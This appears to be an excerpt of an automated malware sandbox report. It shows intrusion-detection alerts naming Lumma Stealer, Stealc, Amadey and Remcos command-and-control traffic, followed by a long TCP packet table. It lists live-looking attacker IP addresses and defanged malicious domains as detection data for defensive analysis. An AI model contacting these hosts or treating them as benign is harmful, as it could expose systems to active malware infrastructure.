2024-11-07T04:13:32.482276+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49963	104.21.5.155	443	TCP
2024-11-07T04:13:33.164036+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49964	185.215.113.206	80	TCP
2024-11-07T04:13:33.628032+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49967	194.59.31.120	8452	TCP
2024-11-07T04:13:34.269386+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49973	185.215.113.43	80	TCP
2024-11-07T04:13:35.236521+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49983	194.59.31.120	8452	TCP
2024-11-07T04:13:35.252141+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49979	185.215.113.16	80	TCP
2024-11-07T04:13:36.079045+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	51687	1.1.1.1	53	UDP
2024-11-07T04:13:36.105644+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	59564	1.1.1.1	53	UDP
2024-11-07T04:13:36.131002+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	63730	1.1.1.1	53	UDP
2024-11-07T04:13:36.138219+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49986	104.21.5.155	443	TCP
2024-11-07T04:13:36.138219+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49986	104.21.5.155	443	TCP
2024-11-07T04:13:36.138916+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	55901	1.1.1.1	53	UDP
2024-11-07T04:13:36.163564+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	64899	1.1.1.1	53	UDP
2024-11-07T04:13:36.845100+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49993	194.59.31.120	8452	TCP
2024-11-07T04:13:36.845548+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:36.845548+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:37.627046+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:37.627046+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:38.321777+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:38.321777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:38.325273+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:38.364296+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:38.364296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:38.454171+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50004	194.59.31.120	8452	TCP
2024-11-07T04:13:38.867433+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:38.867433+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:39.816299+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50009	104.21.5.155	443	TCP
2024-11-07T04:13:39.816299+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50009	104.21.5.155	443	TCP
2024-11-07T04:13:40.056843+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50015	194.59.31.120	8452	TCP
2024-11-07T04:13:40.647582+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50016	185.215.113.43	80	TCP
2024-11-07T04:13:41.411703+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50022	104.21.5.155	443	TCP
2024-11-07T04:13:41.411703+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50022	104.21.5.155	443	TCP
2024-11-07T04:13:41.657659+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50023	194.59.31.120	8452	TCP
2024-11-07T04:13:43.060289+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50035	104.21.5.155	443	TCP
2024-11-07T04:13:43.060289+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50035	104.21.5.155	443	TCP
2024-11-07T04:13:43.254203+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50036	194.59.31.120	8452	TCP
2024-11-07T04:13:44.000205+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:44.000205+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:44.684696+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:44.862688+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50048	194.59.31.120	8452	TCP
2024-11-07T04:13:45.396683+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-07T04:13:45.396683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-07T04:13:46.491114+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50056	194.59.31.120	8452	TCP
2024-11-07T04:13:47.368869+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50062	104.21.5.155	443	TCP
2024-11-07T04:13:47.368869+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50062	104.21.5.155	443	TCP
2024-11-07T04:13:47.372480+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50062	104.21.5.155	443	TCP
2024-11-07T04:13:48.232554+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50070	194.59.31.120	8452	TCP
2024-11-07T04:13:48.453361+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50065	185.215.113.206	80	TCP
2024-11-07T04:13:49.794538+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50080	104.21.5.155	443	TCP
2024-11-07T04:13:49.794538+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50080	104.21.5.155	443	TCP
2024-11-07T04:13:49.839720+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50081	194.59.31.120	8452	TCP
2024-11-07T04:13:50.292249+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50080	104.21.5.155	443	TCP
2024-11-07T04:13:51.441145+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50090	194.59.31.120	8452	TCP
2024-11-07T04:13:53.043927+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50092	194.59.31.120	8452	TCP
2024-11-07T04:13:53.974923+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50093	185.215.113.206	80	TCP
2024-11-07T04:13:54.661248+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50094	194.59.31.120	8452	TCP
2024-11-07T04:13:56.267976+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50096	194.59.31.120	8452	TCP
2024-11-07T04:13:58.281740+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50097	194.59.31.120	8452	TCP
2024-11-07T04:13:58.627998+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50098	185.215.113.206	80	TCP
2024-11-07T04:13:59.878082+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50100	194.59.31.120	8452	TCP
2024-11-07T04:14:01.642789+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50102	194.59.31.120	8452	TCP
2024-11-07T04:14:03.253532+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50103	194.59.31.120	8452	TCP
2024-11-07T04:14:05.799092+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50104	194.59.31.120	8452	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 04:11:51.409915924 CET	49675	443	192.168.2.4	173.222.162.32
Nov 7, 2024 04:11:59.873977900 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:11:59.879292965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:11:59.879385948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:11:59.879523993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:11:59.884669065 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:00.778422117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:00.778476954 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:00.782553911 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:00.787405968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.019037008 CET	49675	443	192.168.2.4	173.222.162.32
Nov 7, 2024 04:12:01.072813034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.072886944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.074026108 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.079368114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.352761984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.352793932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.352806091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.352926970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.355777025 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.414993048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.420109034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693391085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693413973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693456888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693491936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.693510056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693536043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.693543911 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693572044 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.693586111 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.693722963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693736076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693747044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.693772078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.693789959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.694098949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:01.694142103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.832613945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:01.837420940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.110482931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.110548973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:02.126832008 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:02.126883984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:02.131719112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.131752014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.131805897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.131844997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.131855965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.131907940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.914609909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:02.914694071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.187480927 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.192385912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463430882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463465929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463479996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463501930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463517904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.463557959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.463684082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463712931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463723898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.463768005 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.463778973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464087963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464102030 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464116096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464137077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464159966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464533091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464548111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464562893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464585066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464620113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464622021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464637041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.464664936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.464696884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829619884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829659939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829680920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829695940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829696894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829710960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829725981 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829726934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829746962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829749107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829765081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829778910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829790115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829794884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829807997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829816103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829823971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829843998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829859018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829865932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829873085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829894066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829943895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.829965115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829978943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.829992056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830005884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830012083 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830023050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830037117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830039978 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830053091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830070019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830084085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830095053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830099106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830101967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830154896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830188990 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830203056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830216885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830240011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830244064 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830255032 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830264091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830271959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830286980 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830290079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830311060 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830338955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830343962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830357075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830370903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830387115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830400944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.830404043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830425978 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.830455065 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.832751989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.833012104 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.834678888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.834700108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.834744930 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.834772110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.834779024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.834817886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.834829092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.834856987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.835158110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835174084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835187912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835205078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835213900 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.835218906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835237026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.835241079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.835288048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836009979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836061001 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836086035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836101055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836114883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836127996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836138010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836142063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836172104 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836195946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836896896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836911917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836925983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836945057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836951971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.836960077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836977005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.836996078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.837028027 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.837786913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837815046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837830067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837842941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837850094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.837858915 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837873936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.837882996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.837919950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.838640928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838656902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838680029 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838692904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.838694096 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838711023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838713884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.838723898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.838758945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.838794947 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923719883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923767090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923780918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923803091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923804998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923820019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923835039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923842907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923856020 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923866987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923866987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923916101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923943043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923958063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923974037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.923983097 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.923989058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924015999 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924050093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924242973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924274921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924289942 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924308062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924319983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:03.924324989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:03.924348116 CET	80	49730	185.215.113.206	192.168.2.4
